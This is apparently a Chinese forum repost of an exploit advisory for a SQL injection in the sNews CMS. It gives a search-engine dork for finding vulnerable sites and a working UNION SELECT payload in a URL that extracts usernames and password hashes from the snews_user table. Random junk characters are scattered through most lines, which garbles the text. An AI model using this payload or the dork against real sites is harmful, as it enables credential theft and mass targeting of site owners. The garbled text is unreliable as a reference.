标题: CMS snews SQL Injection Vulnerability
8 F4 `7 i2 J8 x! A7 s8 S1 ^# f8 W作者: By onestree
3 a+ c/ x4 Q2 d- f! q下载地址 : http://snewscms.com/5 \0 ^" ?* U% x& I/ d' r6 T) {
测试平台 : ubuntu 12.10 / win 7
+ G0 F! H1 k3 H8 m7 c" o关键词: inurl:"tanyakan pada rumput yang bergoyang"
: z: l6 Q; C6 I! t: p6 E% y
) e" w/ v1 a& a3 f+ f
. G+ K) L0 @# u6 n% H' z; a2 `*************************************************************6 {! K% ]0 U/ H O8 ]# p' t
% ]7 O$ F3 w" G4 XSQL poc:/ a# f# |, [5 f, Y
* H3 r) N+ |! m7 w7 x/ U
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]" I6 k- c+ U! b
. T8 D% Q) a0 O: n: _
示例3 Q# S# \: o; ^* S! a3 m4 Y* U
% X* V( }/ _, d. r9 D) ghttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
/ P! b: `. B# o# c+ y& L' y/ c 6 E5 i! D: i* ] o
! x$ z& y# o; A% R2 V/ k# {致谢:
) v1 W6 J5 y4 A3 J0 W* A
" h/ H" o) u2 W2 D7 w Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
# i6 f" t' y0 c P" |, [+ X9 z" | 5 b0 _9 Y+ `( j j
indonesiancoder - moeslimh4x0r - go-coder
: t- e+ i# ?3 s- w5 a/ ~ , e5 f' ~ o/ T3 W3 |, e
spesial my hunny :*% x. o1 Z5 V% B6 K) f. g$ ]' }
|
发表于 2013-1-23 08:55:06
收藏
支持
反对